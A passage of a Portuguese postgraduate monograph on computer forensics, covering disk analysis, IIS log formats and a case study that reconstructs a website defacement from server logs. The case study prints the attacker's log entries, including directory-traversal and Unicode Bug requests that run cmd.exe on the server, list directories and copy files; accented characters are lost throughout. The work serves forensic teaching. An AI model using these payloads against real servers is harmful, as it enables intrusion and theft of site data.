You are on page 1of 8

Percia Forense Aplicada Informtica - Por Andrey Rodrigues de Freitas

(14 de May de 2007) -

Monografia desenvolvida para o curso de Ps - Graduao "Lato Sensu"em Internet Security, sob a orientao do Prof.
Duval Costa. IBPI / Janeiro de 2003 ResumoO assunto tratado neste trabalho possibilita um vasto campo para estudo e
pesquisas, desta forma com sua modesta abrangncia, este trabalho pretende servir como motivao ao leitor para
busca de novos conhecimentos no campo da percia forense aplicada informtica. No houve aqui a pretenso de
esgotar o assunto, mas sim fornecer ao leitor um texto condensado reunindo conceitos fundamentais ao entendimento
dos termos relacionados.Constar detalhes sobre o processo de percia forense aplicada informtica e a importncia de
seguir procedimentos especficos imediatamente depois de um crime por computador.Introduo A Tecnologia da
Informao avanou rapidamente em pouco tempo. As instituies esto utilizando estes avanos tecnolgicos para melhorar
as operaes empresariais e o potencial de mercado. Pode-se pagar contas on-line; ou comprar qualquer coisa desde
livros a mantimentos. Uma vasta quantia de importantes e sensveis dados fluem ao redor do Cyber Espao e a qualquer
momento poder cair em mos maliciosas. Infelizmente, isto acontece diariamente. Quando algum "rouba" dados do
Cyber Espao, chamado de Cyber Crime. Antigamente a chave para resolver crimes eram obtidas atravs de
impresses digitais, relatrios de toxicologia, anlise de rastro, documentos em papel e outros meios tradicionais.
Enquanto estes ainda provem pedaos muito importantes do quebra-cabea em muitos crimes cometidos hoje, a
tecnologia adicionou uma outra dimenso com a evidncia digital. Freqentemente mais informaes podem ser ganhas da
anlise de um computador que o de uma impresso digital. A histria inteira de um crime pode ser contada com a
recuperao de um arquivo que pensaram ter sido apagado. Captulo 1 Percia Forense Da mesma maneira que com
outras cincias forenses, os profissionais da lei esto reconhecendo que a Percia Forense pode prover evidncia
extremamente importante para solucionar um crime. Como colocada uma maior nfase em evidncia digital, se
tornar crescentemente crtico que a evidncia seja controlada e examinada corretamente.Percia Forense em
Sistemas Computacionais o processo de coleta, recuperao, anlise e correlacionamento de dados que visa, dentro
do possvel, reconstruir o curso das aes e recriar cenrios completos fidedignos. Percia Forense Aplicada a Redes No
Manual de Patologia Forense do Colgio de Patologistas Americanos (1990), a cincia forense definida como a
aplicao de princpios das cincias fsicas ao direito na busca da verdade em questes cveis, criminais e de
comportamento social para que no se cometam injustias contra qualquer membro da sociedade. Portanto, define-se a
percia forense aplicada a redes como o estudo do trfego de rede para procurar a verdade em questes cveis, criminais
e administrativas para proteger usurios e recursos de explorao, invaso de privacidade e qualquer outro crime
promovido pela contnua expanso das conexes em rede. Anlise Pericial A anlise pericial o processo usado pelo
investigador para descobrir informaes valiosas, a busca e extrao de dados relevantes para uma investigao. O
processo de anlise pericial pode ser dividido em duas camadas : anlise fsica e anlise lgica. A anlise fsica a
pesquisa de seqncias e a extrao de dados de toda a imagem pericial, dos arquivos normais s partes inacessveis da
mdia. A anlise lgica consiste em analisar os arquivos das parties. O sistema de arquivos investigado no formato
nativo, percorrendo-se a rvore de diretrios do mesmo modo que se faz em um computador comum. Anlise
Fsica Durante a anlise fsica so investigados os dados brutos da mdia de armazenamento. Ocasionalmente, pode-se
comear a investigao por essa etapa, por exemplo quando se est investigando o contedo de um disco rgido
desconhecido ou danificado. Depois que o software de criao de imagens tiver fixado as provas do sistema, os dados
podem ser analisados por trs processos principais : uma pesquisa de seqncia, um processo de busca e extrao e
uma extrao de espao subaproveitado e livre de arquivos. Todas as operaes so realizadas na imagem pericial ou na
copia restaurada das provas. Com freqncia, se faz pesquisas de seqncias para produzir listas de dados . essas
listas so teis nas fases posteriores da investigao. Entre as listas geradas esto as seguintes: Todos os URLs
encontrados na mdia. Todos os endereos de e-mail encontrados na mdia. Todas as ocorrncias de pesquisa de
seqncia com palavras sensveis a caixa alta e baixa. Fazendo a Pesquisa de Seqncia O primeiro processo da
anlise fsica a pesquisa de seqncias em todo o sistema. Uma das ferramentas de base DOS mais precisa o
StringSearch. Ela retorna o contedo da pesquisa de seqncia e o deslocamento de byte do incio do arquivo Quando
se examinam os resultados da pesquisa de seqncias, tem-se um prtico roteiro para converter o deslocamento em
um valor de setor absoluto.O Processo de Busca e ExtraoAlguns tipos de caso podem beneficiar-se de uma forma
especializada de pesquisa de seqncia , o processo de busca e extrao. Este o segundo dos trs que se usa
durante a analise fsica. O aplicativo analisa uma imagem pericial em busca de cabealhos dos tipos de arquivos
relacionados ao tipo de caso em que se estiver trabalhando. Quando encontra um, extrai um nmero fixo de bytes a
partir do ponto da ocorrncia. Por exemplo, se estiver investigando um indivduo suspeito de distribuio de pornografia
ilegal, analisa-se a imagem pericial e se extrai blocos de dados que comecem com a seguinte seqncia
hexadecimal:$4A $46 $49 $46 $00 $01 Esta seqncia identifica o incio de uma imagem JPEG. Alguns formatos de
arquivos (entre eles o JPEG) incluem o comprimento do arquivo no cabealho. Isto muito til quando se est
extraindo dados brutos de uma imagem pericial. Esta capacidade de extrao forada de arquivos incrivelmente til em
sistemas de arquivos danificados ou quando os utilitrios comuns de recuperao de arquivos apagados so ineficientes
ou falham completamente. Extraindo Espao Subaproveitado e Livre de Arquivos At certo ponto, todos os sistemas de
arquivos tm resduos. Os tipos de resduo se enquadram em duas categorias: espao livre, ou no-alocado, e espao
subaproveitado. O espao livre qualquer informao encontrada em um disco rgido que no momento no esteja alocada
em um arquivo. O espao livre pode nunca ter sido alocado ou ser considerado como no-alocado aps a excluso de um
arquivo. Portanto, o contedo do espao livre pode ser composto por fragmentos de arquivos excludos. O espao livre
pode estar em qualquer rea do disco que no esteja atribuda a um arquivo nativo, como um bloco de dados vazio no
meio da terceira partio ou no 4253 o setor no-atribudo da unidade, que no faz parte de uma partio por estar entre o
http://peritocriminal.net/mambo - NOTCIAS - PERITOCRIMINAL.COM.BR

Powered by Mambo

Generated: 7 August, 2007, 17:09

cabealho e a primeira tabela de alocao de arquivos. Informaes de escritas anteriores podem ainda estar nessas reas
e ser inacessveis para o usurio comum. Para analisar o espao livre preciso trabalhar em uma imagem do nvel fsico.
O espao subaproveitado ocorre quando dados so escritos na mdia de armazenamento em blocos que no preenchem o
tamanho de bloco mnimo definido pelo sistema operacional. Se decidir extrair o espao de arquivos subaproveitados e
livre, isto torna-se o terceiro processo de anlise fsica mais importante. Esse processo exige uma ferramenta que
possa distinguir a estrutura particular de sistema de arquivos em uso. Anlise Lgica Durante um exame de arquivos
lgicos, o contedo de cada partio pesquisada com um sistema operacional que entenda o sistema de arquivos.
neste estgio que cometida a maioria dos erros de manipulao das provas. O investigador precisa estar ciente de
todas as medidas tomadas na imagem restaurada. por isto que quase nunca se usa diretamente sistemas operacionais
mais convenientes, como o Windows 95/98/NT/2000/XP. Mais uma vez, o objetivo bsico proteger as provas contra
alteraes. Montar ou acessar a imagem restaurada a partir de um sistema operacional que entenda nativamente o
formato do sistema de arquivos muito arriscado, pois normalmente o processo de montagem no documentado, no
est disposio do publico e no pode ser verificado. A imagem restaurada precisa ser protegida e por isso que se
monta cada partio em Linux, em modo somente leitura. O sistema de arquivos montado ento exportado, via Samba,
para a rede segura do.laboratrio, onde os sistemas Windows 2000, carregados com visualizadores de arquivos, podem
examinar os arquivos. claro que a abordagem ditada pelo prprio caso. Se fizer uma duplicata pericial de um sistema
Irix 6.5, provvel que se evite usar o Windows 2000 para visualizar os dados.Entendendo Onde Ficam as
Provas Locais onde se podem descobrir informaes valiosas para uma investigao em trs reas :Espao de arquivos
lgicos : Refere-se aos blocos do disco rgido que, no momento do exame, esto atribudos a um arquivo ativo ou
estrutura de contabilidade do sistema de arquivos (como as tabelas FAT ou as estruturas inode). Espao subaproveitado :
Espao formado por blocos do sistema de arquivos parcialmente usados pelo sistema operacional. Chamamos todos os
tipos de resduo de arquivos, como a RAM e os arquivos subaproveitados, de espao subaproveitado. Espao no-alocado :
Qualquer setor no tomado, esteja ou no em uma partio ativa. Para fins de ilustrao, os dados de um disco rgido foram
divididos em camadas, parecidas s do modelo de rede OSI. Encontram-se informaes com valor de provas em todas
essas camadas. O desafio encontrar a ferramenta certa para.extrair as informaes. A tabela 1 mostra as relaes entre
setores, clusters, parties e arquivos. Isso ajuda a determinar o tipo de ferramenta a ser usada para extrair as
informaes. Cada camada do sistema de arquivos tem um fim definido, para o sistema operacional ou para o hardware
do computador.
Tabela 1: Camadas de armazenamento do sistema de arquivos
Captulo 2 - Percia Forense para Obteno de
EvidnciasDiariamente h diversos tipos de casos de fraudes e crimes (Cyber Crimes), onde omeio eletrnico foi em
algum momento utilizado para este fim. A misso da perciaforense a obteno de provas irrefutveis, as quais iro se
tornar o elementochave na deciso de situaes jurdicas, tanto na esfera civil quanto criminal. Paratanto, critico
observar uma metodologia estruturada visando obteno dosucesso nestes projetos.IdentificaoDentre os vrios fatores
envolvidos no caso, necessrio estabelecer com clareza quais so as conexes relevantes como datas, nomes de
pessoas, empresas, rgos pblicos, autarquias, instituies etc., dentre as quais foi estabelecida a comunicao eletrnica.
Discos rgidos em computadores podem trazer a sua origem (imensas quantidades de informaes) aps os processos de
recuperao de dados.PreservaoTodas as evidncias encontradas precisam obrigatoriamente ser legtimas, para terem
sua posterior validade jurdica. Sendo assim, todo o processo relativo obteno e coleta das mesmas, seja no elemento
fsico (computadores) ou lgico (mapas de armazenamento de memria de dados) deve seguir normas internacionais.
Parte-se sempre do princpio de que a outra parte envolvida no caso poder e dever pedir a contra-prova, sobre os
mesmos elementos fsicos, ento o profissionalismo destas tarefas ser critico na seqncia do processo, lembrando
sempre que, caso o juiz no valide a evidncia, ela no poder ser re-apresentada.AnliseSer a pesquisa
propriamente dita, onde todos os filtros de camadas de informao j foram transpostos e pode-se deter especificamente
nos elementos relevantes ao caso em questo. Novamente, deve-se sempre ser muito profissional em termos da
obteno da chamada "prova legtima", a qual consiste numa demonstrao efetiva e inquestionvel dos rastros e
elementos da comunicao entre as partes envolvidas e seu teor, alm das datas, trilhas, e histrico dos segmentos de
disco utilizados.ApresentaoTecnicamente chamada de "substanciao da evidncia", ela consiste no enquadramento
das evidncias dentro do formato jurdico como o caso ser ou poder ser tratado. Os advogados de cada uma das
partes ou mesmo o juiz do caso podero enquadr-lo na esfera civil ou criminal ou mesmo em ambas.Desta forma,
quando se tem a certeza material das evidncias, atua-se em conjunto com uma das partes acima descritas para a
apresentao das mesmas.Captulo 3 - Investigando Servidores WebOs ataques com base em Web geralmente se
encaixam em trs (3) categorias: ataques contra o prprio servidor (um pedido de acesso), ataques contra o contedo
(desfigurao do site/defacement) e ataques contra a empresa ou organizao (roubo de produto ou informao). Os
ataques via Web so freqentes devido vulnerabilidade no software e autenticao do sistema operacional e os mais
comuns so os de desfigurao de site. Em um sistema Web pode-se envolver diferentes tecnologias, tais como: Java,
JavaScript, VbScript, Active Server Pages (ASP), Secure Sockets Layer (SSL), Common Gateway Interface (CGI), PHP,
HTML, ColdFusion, etc. E os mtodos investigativos so facilmente adaptados para qualquer uma dessas
tecnologias.Investigaes em servidores Web so mais facilmente conduzidas com a assistncia de administradores e
desenvolvedores do site. Diversos arquivos de log podem ser usados para confirmar ou no se um incidente ocorreu e
ento determinar o tipo, extenso, causa e origem do incidente. Somente uma entrada no arquivo de log possa no ser
suficiente para termos uma imagem do incidente, mas uma srie de entradas d ao investigador um controle do tempo
e o contexto necessrio para compreender o incidente. Uma compreenso geral do incidente fundamental para a
resposta eficaz.Antes de poder recuperar a segurana de um servidor Web, preciso compreender sua
vulnerabilidade.Microsoft IIS (Internet Information Server)A forma mais simples de segurana de um Web Site manter
http://peritocriminal.net/mambo - NOTCIAS - PERITOCRIMINAL.COM.BR

Powered by Mambo

Generated: 7 August, 2007, 17:09

um log dos computadores que contatam o site. O log um registro de quem visitou, quando visitou e o que procurou no
site. Ao verificar os logs, pode-se descobrir quantas pessoas esto usando o site e certificar-se de que ningum est
fazendo mau uso dele. Ao investigar arquivos de log, as informaes so armazenadas de uma forma legvel e simples. Os
campos importantes para investigar incidentes suspeitos incluem o registro data/hora, endereo IP de origem, cdigo do
status do HTTP e recurso requisitado.No IIS, o arquivo de log padro est localizado no diretrio
C:\WINNT\System32\Logfiles\W3SVC1 e o nome do log baseado na data atual, no formato exaammdd.log, por
exemplo: ex020327.log. O formato padro o W3C (World Wide Web Consortium) Extended Log File Format (Formato
de Arquivo de Log Estendido), um formato padro que muitos utilitrios de terceiros interpretam e analisam. Outros
formatos disponveis so: Microsoft IIS Log File Format (Formato de log do Microsoft IIS) , NCSA Common Log File
Format (Formato de arquivo de log comum do NCSA) e log ODBC (Open Database Connectivity) em sistemas Windows
2000, que envia um formato fixo a um banco de dados especificado.W3C Extended Log File FormatO formato estendido
do W3C um formato ASCII personalizvel com vrios campos diferentes. Pode-se incluir campos importantes, ao
mesmo tempo em que limita o tamanho do log omitindo campos indesejveis. Os campos so separados por espaos. O
horrio registrado como UTC (Hora de Greenwich). O exemplo abaixo mostra linhas de um arquivo que usa os
seguintes campos: Hora, Endereo IP do cliente, Mtodo, Tronco URI, Status do HTTP e Verso do HTTP. #Software:
Microsoft Internet Information Services 5.0#Version: 1.0#Date: 2002-03-27 17:42:15#Fields: time c-ip cs-method cs-uristem sc-status cs-version17:42:15 172.16.255.255 GET /default.asp 200 HTTP/1.0A entrada anterior indica que no dia
27 de maro de 2002 s 17:42, UTC, um usurio com a verso 1.0 do HTTP e o endereo IP 172.16.255.255 emitiu um
comando GET do HTTP para o arquivo Default.asp. A solicitao foi atendida sem erro. O campo #Date: indica quando a
primeira entrada do log foi feita; essa entrada feita quando o log criado. O campo #Version: indica que foi usado o
formato de log do W3C.. possvel selecionar qualquer um dos campos, mas alguns campos podem no ter informaes
disponveis para algumas solicitaes. Para os campos que forem selecionados, mas para os quais no houver informaes,
aparecer um travesso () no campo como um espao reservado.Definies do Log do W3C Extended Log File
FormatDefinies de Log de Contabilizao de Processos De todos os campos que podem ser encontrados nos arquivos de
logs, o HTTP Status (sc-status) requer alguma explicao. Em geral, qualquer cdigo entre 200 e 299 indica sucesso, os
cdigos entre 300 e 399 indicam aes que precisam ser tomadas pelo cliente para cumprir um pedido. Cdigos entre 400 e
499 e entre 500 e 599 indicam erros do cliente e servidor, respectivamente.Microsoft IIS Log File FormatO formato do
arquivo de log do Microsoft IIS um formato ASCII fixo (no personalizvel). Ele registra mais informaes que o formato
comum do NCSA. O formato do Microsoft IIS inclui itens bsicos como o endereo IP do usurio, o nome do usurio, a
data e o horrio da solicitao, o cdigo de status do HTTP e o nmero de bytes recebidos. Alm disso, ele inclui itens
detalhados como o tempo decorrido, o nmero de bytes enviados, a ao (por exemplo, um download efetuado por um
comando GET) e o arquivo de destino. Os itens so separados por vrgulas, tornando o formato mais fcil de ler que os
outros formatos ASCII, que usam espaos como separadores. O horrio registrado na hora local.Quando se abre um
arquivo no formato do Microsoft IIS em um editor de texto, as entradas sero semelhantes aos seguintes
exemplos:192.168.114.201, , 03/27/2002, 7:55:20, W3SVC2, VENDAS1, 192.168.114.201,4502, 163, 3223, 200, 0,
GET, DeptLogo.gifOs exemplos de entradas acima so interpretados nas tabelas a seguir. A linha superior nas duas
tabelas da segunda instncia do site da Web (que aparece na coluna "Servio" como W3SVC). O exemplo
apresentado em duas tabelas devido s limitaes de largura da pgina.No exemplo, a primeira entrada indica que um
usurio annimo com o endereo IP 192.168.114.201 emitiu um comando GET do HTTP para o arquivo de imagem
DeptLogo.gif s 7:55 em 27 de maro de 2002, de um servidor chamado VENDAS1 no endereo IP 172.21.13.45. A
solicitao HTTP de 163 bytes gastou um tempo de processamento de 4502 milisegundos (4,5 segundos) para ser
concluda e retornou, sem erro, 3223 bytes de dados para o usurio annimo.No arquivo de log, todos os campos
terminam com uma vrgula (,). Um hfen agir como um marcador de posio se no houver valor vlido para um
determinado campo.NCSA Common Log File FormatO formato comum do NCSA um formato ASCII fixo (no
personalizvel), disponvel para sites da Web mas no para sites FTP. Ele registra informaes bsicas sobre solicitaes
de usurios, como o nome do host remoto, o nome de.usurio, a data, o horrio, o tipo de solicitao, o cdigo de status
do HTTP e o nmero de bytes recebidos pelo servidor. Os itens so separados por espaos; o horrio registrado na
hora local. Quando se abre um arquivo do formato comum do NCSA em um editor de texto, as entradas sero
semelhantes ao seguinte exemplo:172.21.13.45 INFORMATICA\Andrey [08/Apr/2002:17:39:04 -0800]
"GET/scripts/iisadmin/ism.dll?http/serv HTTP/1.0" 200 3401Observao : Na entrada anterior, o segundo campo (que
deveria mostrar o nome de log remoto do usurio) est vazio e representado por um hfen aps o endereo IP
172.21.13.45. O exemplo de entrada anterior interpretado nas tabelas a seguir. O exemplo apresentado em duas
tabelas devido s limitaes de largura da pgina. A entrada indica que um usurio chamado Andrey no domnio
INFORMATICA, com o endereo IP 172.21.13.45, emitiu um comando GET do HTTP (ou seja, descarregou um arquivo)
s 17:39 no dia 8 de abril de 2002. A solicitao retornou, sem erro (220), 3401 bytes de dados para o usurio chamado
Andrey.Log ODBCOutra opo registrar solicitaes do site da Web em um banco de dados Open Database Connectivity
(ODBC). Para registrar em um banco de dados ODBC, ser preciso configurar o Data Source Name (DSN, nome da
fonte de dados), a tabela e especificar o nome de usurio e a senha a serem usados durante o registro no banco de
dados. Uma diferena importante entre o registro do ODBC e as outras opes que com ele, uma nica transmisso cria
vrios registros. Por causa desse grande nmero de entradas, o registro do ODBC requer mais recursos de servidor
que os outros mtodos de registro, podendo afetar o desempenho do servidor Web, dependendo do tipo de banco de
dados, localizao e quantidade de entradas registradas.A lista a seguir um exemplo dos campos que os registros do
ODBC geram :Clienthost : Endereo IP do cliente;Username : Nome de domnio do cliente;Logtime : Data e hora da
conexo;Service : Servio do Internet Information Server;ServerIP : Endereo IP do servidor;Processing Time : Tempo de
processamento em milessegundos;BytesRecvd : Bytes recebidos pelo servidor;BytesSent : Bytes enviados pelo
http://peritocriminal.net/mambo - NOTCIAS - PERITOCRIMINAL.COM.BR

Powered by Mambo

Generated: 7 August, 2007, 17:09

servidor;ServiceStatus : Cdigo de resposta do protocolo;Win32Status : Status do Windows 2000 Server ou o cdigo do


erro;.Operation : Comando do protocolo;Target : Destinatrio.Nomes de Arquivos de LogOs nomes de arquivos de log
usam vrias das primeiras letras para representar o formato de log e os nmeros restantes para representar o
intervalo de tempo ou a seqncia do log. As letras em itlico representam dgitos: nn para os dgitos seqenciais, yy para
o ano, mm para o ms, ww para a semana do ms, dd para o dia, hh para o horrio no formato de 24 horas (ou seja,
17 corresponde a 5:00 P.M.).Anlise de um Sistema ComprometidoAps ter sido apresentado como so os formatos dos
arquivos de logs do servidor Web IIS da Microsoft e suas caractersticas, inicia-se agora um estudo de caso em que uma
grande empresa teve seu site Web desfigurado (defacement). Ser demonstrado como o hacker entrou no sistema, de
onde vem o ataque e qual foi a alterao ocorrida no sistema. Ao estudar um ataque deve-se comear pelo incio da
tentativa de invaso. Onde o hacker comeou ? Aps identificar o incio, pode-se fazer o passo a passo do ataque
decodificando o mesmo.O AvisoNo dia 27 de maro de 2002, recebemos a informao de que um dos servidores web
havia sido atacado e que a pgina inicial do site da empresa teria sido alterada. Os servidores web recebem inmeras
sondagens, varreduras (scans) e consultas diariamente. Entretanto, uma informao como esta informada pelo
administrador da rede merece uma ateno imediata, uma vez que os ataques via Web so do tipo de ataque mais
devastador em termos de percepo do pblico.A SondagemSabemos que a desfigurao aconteceu no dia 27/03/2002.
Assim sendo, comearemos procurando nos arquivos de logs do IIS por possveis sondagens de informaes : o estgio
de coleta de informaes. Se o hacker tem por finalidade especfica atacar o site de uma empresa (para roubo de
informaes ou produto), normalmente se comea com a coleta de informaes. Primeiro ir determinar quais as informaes
sobre o software e funcionalidade do servidor Web esto disponveis, podendo utilizar um "site espelhado" para
estudo. Embora no seja ilegal e no indique um ataque por si s, quando esse tipo de coleta de informaes combinada
com outras atividades, o investigador deve desconfiar. Para examinar a total funcionalidade do site, o invasor espelha o
site, copiando cada pgina para examin-las em detalhes off-line. Para o IIS, essa atividade deve aparecer como
muitos pedidos do mesmo IP de origem durante um curto perodo de tempo :2002-03-25 12:26:13 200.165.19.23 GET /
4012002-03-25 12:26:14 200.165.19.23 GET /Default.asp 2002002-03-25 12:26:15 200.165.19.23 GET /principal.asp
2002002-03-25 12:26:15 200.165.19.23 GET /img/logo1.jpg 2002002-03-25 12:26:15 200.165.19.23 GET
/img/pixel_branco.gif 4012002-03-25 12:26:16 200.165.19.23 GET /img/l_eazul.gif 2002002-03-25 12:26:16
200.165.19.23 GET /img/l_dazul.gif 2002002-03-25 12:26:17 200.165.19.23 GET /img/l_1eazul.gif 200Observe a data
do espelhamento do site, 25 de maro, dois dias anteriores ao ataque. Depois de reunir informaes sobre o servidor Web
e criar o espelhamento do site, o invasor comea a "varredura da vulnerabilidade". O invasor procura pela existncia de
pginas Web com vulnerabilidades conhecidas.Os detalhes-chave a serem procurados nos logs so pedidos repetidos
de recursos que resultam em cdigos de erro sendo retornados ao cliente. Qualquer varredura de vulnerabilidade
procurando por pginas vulnerveis conhecidas da Web inevitavelmente incorrero em muitos cdigos de erro do tipo
404 ("arquivo no encontrado file not found"). Alm disso, o IP de origem deve continuar estvel e em um curto perodo
de tempo.2002-03-26 22:03:30 200.165.19.23 GET /scripts/.._../winnt/system32/cmd.exe4012002-03-26 22:03:35
200.165.19.23 GET/scripts/.._.._../winnt/system32/cmd.exe 4012002-03-26 22:03:39 200.165.19.23 GET
/winnt/system32/cmd.exe 4012002-03-26 22:03:42 200.165.19.23 GET /winnt/system32/cmd.exe 4042002-03-26
22:03:45 200.165.19.23 GET /command/system32/CACLS.EXE 2002002-03-26 22:03:47 200.165.19.23 GET
/command/system32/calc.exe 4012002-03-26 22:03:49 200.165.19.23 GET /inetpub/wwwroot/cmd.exe /c+dir. 401200203-26 22:03:51 200.165.19.23 GET/scripts/../../winnt/system32/cmd.exe?/c+dir+c: 5002002-03-26 22:03:52
200.165.19.23 GET/scripts/..\../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 5002002-03-26 22:03:53 200.165.19.23
GET /IISSamples/Default/teste.asp 4042002-03-26 22:03:55 200.165.19.23 GET /IISSamples/Default/sdfgdfgdfgfg.idq
4042002-03-26 22:03:58 200.165.19.23 GET/scripts/../../winnt/system32/cmd.exe?/c+dir 5002002-03-26 22:04:01
200.165.19.23 GET/scripts..\../winnt/system32/cmd.exe?/c+dir 5002002-03-26 22:04:03 200.165.19.23
GET/scripts/..\../winnt/system32/cmd.exe?/c+dir 5002002-03-26 22:04:04 200.165.19.23
GET/scripts/../../winnt/system32/cmd.exe?/c+dir 5002002-03-26 22:04:05 200.165.19.23
GET/scripts/..\../winnt/system32/cmd.exe?/c+dir 5002002-03-26 22:04:06 200.165.19.23
GET/scripts/.._../winnt/system32/cmd.exe?/c+dir 5002002-03-26 22:04:07 200.165.19.23
GET/scripts/..\../winnt/system32/cmd.exe?/c+dir 5002002-03-26 22:04:08 200.165.19.23
GET/scripts/..o../winnt/system32/cmd.exe?/c+dir 5002002-03-26 22:04:09 200.165.19.23
GET/scripts/../../winnt/system32/cmd.exe?/c+dir 500.2002-03-26 22:04:11 200.165.19.23 GET/scripts/.. 2002-03-26
22:04:12 200.165.19.23 GET/scripts/.. 2002-03-26 22:04:14 200.165.19.23 GET/scripts/.. 2002-03-26 22:04:15
200.165.19.23 GET/msadc/../../../../../../winnt/system32/cmd.exe?/c+dir 5002002-03-26 22:04:17 200.165.19.23
GETbin/../../../../../../winnt/system32/cmd.exe?/c+dir 5002002-03-26 22:04:18 200.165.19.23
GET/samples/../../../../../../winnt/system32/cmd.exe?/c+dir 5002002-03-26 22:04:19 200.165.19.23
GET/_vti_cnf/../../../../../../winnt/system32/cmd.exe?/c+dir 5002002-03-26 22:04:20 200.165.19.23
GET/_vti_bin/../../../../../../winnt/system32/cmd.exe?/c+dir 500 ../winnt/system32/cmd.exe?/c+dir 500
../winnt/system32/cmd.exe?/c+dir 500 ../winnt/system32/cmd.exe?/c+dir 500Observe tambm as datas das
varreduras em busca de vulnerabilidades, 26 de maro, o dia anterior ao ataque. Agora j se consegue montar a
primeira parte da histria. O hacker primeiro espelha o site da empresa para possveis estudos (25/03/2002) e depois
varre o servidor para determinar se era vulnervel a alguma explorao (26/03/2002).Encontrando a VulnerabilidadeO
primeiro indcio do ataque foi encontrado no dia anterior ao defacement (s 23:45:32) no arquivo ex020326.log, o dia em
que o Hacker descobriu a vulnerabilidade no servidor Web, vulnerabilidade esta denominada Unicode Bug.Unicode
BugO invasor explora uma vulnerabilidade no IIS advinda de uma falha de programao, que permite atravs de uma
linha de comando no browser ou atravs de um exploit, visualizar e alterar o contedo de um servidor Windows
NT/2000.Os registros encontrados nos arquivos de logs demonstrando os ataques sero denominados de "Registro da
http://peritocriminal.net/mambo - NOTCIAS - PERITOCRIMINAL.COM.BR

Powered by Mambo

Generated: 7 August, 2007, 17:09

ocorrncia" e algumas telas de respostas obtidas pelo Hacker sero chamadas como "Resposta obtida".O invasor
descobre a vulnerabilidade de Unicode no servidor da empresa.Registro da ocorrncia2002-03-26 23:45:32
200.165.19.23 GET/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir 200:Durante algumas horas o invasor no volta a
atacar, provavelmente planeja quais informaes procurar e qual o plano a seguir.O AtaqueCom a descoberta da
vulnerabilidade no dia anterior, o Hacker comea a explorar o servidor em busca de informaes, o primeiro registro
encontrado no dia 27/03 uma listagem no diretrio c:\winnt\system32 s 03:23:51, o mesmo tipo de registro encontrado
anteriormente.Registro da ocorrncia2002-03-27 03:23:51 200.165.19.23
GET/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir 200 Resposta obtidaPasta de c:\winnt\system3214/01/2002
09:07 <DIR> .14/01/2002 09:07 <DIR> ..15/02/2002 16:37 301 $winnt$.inf23/01/2000 22:00 32.528
aaaamon.dll23/01/2000 22:00 69.904 access.cpl13/09/2001 17:00 71.168 acctres.dll23/01/2000 22:00 154.896
accwiz.exe23/01/2000 22:00 61.952 acelpdec.ax15/12/2001 13:34 <DIR> Config...1929 arquivo(s) 258.173.466 bytes33
pasta(s) 1.784.097.664 bytes disponveis:Com o total acesso ao servidor, o invasor procura saber onde se hospeda o
site da empresa, listando a raiz do servidor.Registro da ocorrncia2002-03-27 03:24:45 200.165.19.23
GET/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ 200: Resposta obtidaPasta de c:\07/01/2002 17:54 <DIR>
Arquivos de programas06/01/2001 15:33 69 DOCUMENT16/02/2002 10:06 <DIR> Documents and Settings20/03/2002
10:17 <DIR> DrWatson15/03/2001 17:10 <DIR> Inetpub07/06/2001 15:59 <DIR> mspclnt15/05/2001 13:42 <DIR>
Sites20/06/2001 14:14 <DIR> temp07/11/2001 17:39 <DIR> usr07/11/2001 17:54 <DIR> WINNT1 arquivo(s) 69 bytes9
pasta(s) 1.785.602.048 bytes disponveisPor padro, se hospedam os Web Sites no diretrio c:\Inetpub\wwwroot\, mas o
invasor descobre que o administrador no usa a instalao default pois dentro do diretrio wwwroot no h nenhum
arquivo.Registro da ocorrncia2002-03-26 03:25:53 200.165.19.23
GET/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot 200: Resposta obtidaPasta de
c:\inetpub\wwwroot15/03/2001 17:10 <DIR> .15/03/2001 17:10 <DIR> ..0 arquivo(s) 0 bytes2 pasta(s) 1.785.491.456
bytes disponveis:O Hacker lista mais alguns diretrios (usr, temp) a procura do Web Site ou de informaes que sejam
importantes...Registros da ocorrncia:2002-03-27 03:26:03 200.165.19.23
GET/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\usr 2002002-03-27 03:27:33 200.165.19.23
GET/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\temp 200.. e descobre onde est o site da empresa, no
diretrio Sites.Registro da ocorrncia:2002-03-27 03:28:11 200.165.19.23
GET/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\sites 200. Resposta obtidaPasta de C:\Sites15/05/2001 13:08
<DIR> .15/05/2001 13:08 <DIR> ..20/05/2001 11:37 <DIR> Base24/05/2001 15:07 <DIR> Imagens29/05/2001 11:49 208
default.asp12/11/2001 15:46 <DIR> Pagamentos20/05/2001 11:37 <DIR> Projetos12/08/2001 17:14 <DIR>
SiteSeguro31/02/2002 12:32 1.100 global.asa26/03/2002 15:04 2.286 principal.asp3 arquivo(s) 3.594 bytes7 pasta(s)
1.785.126.912 bytes disponveis:Para facilitar seu trabalho de digitao das linhas de comando, o invasor copia o
programa cmd.exe do diretrio c:\winnt\system32 para dentro do diretrio do site, c:\sites, (provavelmente ele usou algum
exploit para encontrar a vulnerabilidade, mas para poder continuar a explorar o servidor necessrio digitar
manualmente os comandos).

Figura 1CmdInterpretador de comandos do Windows.Registro da ocorrncia2002-03-27 03:30:22 200.165.19.23


GET/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\sites\cmd.exe 200:O Web Site
da empresa foi todo elaborado usando a tecnologia ASP (Active Server Pages) da Microsoft, as pginas so
processadas no servidor e enviadas aos usurios no formato html, portanto um cliente (browser) no tem acesso ao
cdigo-fonte da programao ASP.Sabendo que no seria possvel visualizar o cdigo fonte das pginas em ASP, o invasor
copia as pginas renomeando-as para uma outra extenso e depois visualiza seu contedo. A extenso escolhida pelo
Hacker foi do tipo doc, que pode ser visualizada em qualquer browser, porm, se tivesse escolhido um outro formato
como html ou txt nada apareceria em sua tela, mas no quer dizer que estaria errado, somente seria mais trabalhoso
para visualizar o contedo da pgina, pois teria que no browser escolher a opo "Exibir cdigo fonte".O invasor cria um
documento na raiz do site com o nome de pagamento.doc contendo todo o contedo da pgina de programao
pagamento.asp, este arquivo contm todo o processo e inteligncia do sistema de pagamento on-line da empresa
